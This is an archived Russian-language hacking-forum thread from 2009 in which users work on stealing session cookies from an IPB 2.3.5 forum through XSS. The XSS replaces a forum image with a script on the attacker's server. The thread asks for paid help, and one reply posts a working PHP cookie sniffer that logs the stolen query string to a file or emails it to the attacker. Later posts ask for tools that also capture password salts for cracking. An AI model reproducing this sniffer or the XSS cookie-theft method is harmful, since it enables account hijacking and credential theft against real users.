Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Отсутствует pass_hash в cookie IPB 2.3.5. (https://forum.antichat.xyz/showthread.php?t=125186)

Человек с пятью не 14.06.2009 13:01
Отсутствует pass_hash в cookie IPB 2.3.5.
 
Друзья! У меня возникла проблема с кражей cookie.
Воруются они с форума на IPB 2.3.5 через XSS.
Удаётся при наведении юзером мышкой на картинку заменять одно из изображений форума на такое же точно, только на моём сервере . Вы наверное уже понимаете, что на моём сервере не совсем изображение, а скрипт, который сначала записывает cookie, а потом уже выдаёт картинку. Т.е. выглядит это так: site/images/123.jpg?cookie.


Так вот, ситуация такова - куки в браузере есть полностью, а в логах - не достаёт важных параметров member_id (иногда) и pass_hash (почти всегда).
Исключение составляют юзеры с Opera 9.23 и 9.27 - у них куки воруются отлично - pass_hash присутствует.

Подскажите, пожалуйста, как быть! Возможности JS очень ограничены, форум часто режет или портит скрипт.

Спасибо :)

Человек с пятью не 14.06.2009 19:23
Товарищи! Могу заплатить за решение проблемы. Тянуть для меня опасно.

FALTONICK 14.06.2009 19:27
может чел не авторизовался

Человек с пятью не 14.06.2009 19:43
Нет, member_id иногда присутствует, а вот pass_hash нет никогда.
Да и вообще анонимов сниффер из лога сразу отсеивает, дело точно не в этом.

Ну так что, даже за деньги никто не поможет?

Человек с пятью не 15.06.2009 12:50
Сегодня поймал юзера с Firefox 3.0.5. Непонятно.

shOotzy 13.07.2009 07:56
Такая-же проблема...
крадёт только сессию... пробывал на разных браузерах...результат почти один и тотже (иногда и куки сесии нет) .

P.S Человек с пятью не, можешь свой снифер скинуть?

G4bR1eL 15.07.2009 10:34
Вроде баг с кражей кукисов доступен только до 2.1.7 IPB, в позжих версиях он не пашет

shOotzy 17.07.2009 10:31
shOotzy
 
Цитата:
Сообщение от G4bR1eL
Вроде баг с кражей кукисов доступен только до 2.1.7 IPB, в позжих версиях он не пашет
Цитата:
Сообщение от Человек с пятью не
Друзья! У меня возникла проблема с кражей cookie.
Воруются они с форума на IPB 2.3.5 через XSS.
Удаётся при наведении юзером мышкой на картинку заменять одно из изображений форума на такое же точно, только на моём сервере . Вы наверное уже понимаете, что на моём сервере не совсем изображение, а скрипт, который сначала записывает cookie, а потом уже выдаёт картинку. Т.е. выглядит это так: site/images/123.jpg?cookie.


Так вот, ситуация такова - куки в браузере есть полностью, а в логах - не достаёт важных параметров member_id (иногда) и pass_hash (почти всегда).
Исключение составляют юзеры с Opera 9.23 и 9.27 - у них куки воруются отлично - pass_hash присутствует.

Подскажите, пожалуйста, как быть! Возможности JS очень ограничены, форум часто режет или портит скрипт.

Спасибо :)

P.S есть у кого-нибудь Нормальный сниффер?

G4bR1eL 17.07.2009 17:54
Код:
<?php

$file = true;                        //сохранять в файл
$filename = "cookies.txt";        //имя файла
$mail = false;                        //отправлять на мыло
$mailaddr = "xxx@mail.ru";        //адрес мыла

if ($file)
{ $f = fopen($filename, 'a');
  flock($f,2);
  fputs($f, $QUERY_STRING."\r\n\r\n\r\n");
  fflush ($f);
  flock($f,3);
  fclose($f); }

if ($mail)
{ mail ($mailaddr, "Uzer waz XSSed! Eat his cookies! :)", "$QUERY_STRING"); }

?>
Должен пахать, пробуй. Хеши точно тырит.

Кстати не по теме , но все равно - есть ли такие сниферы которые тянут с хешем salt (соль). Если у кого есть киньте, ибо надо для расшифровки некоторых пассов на 2.1.7.


Время: 12:39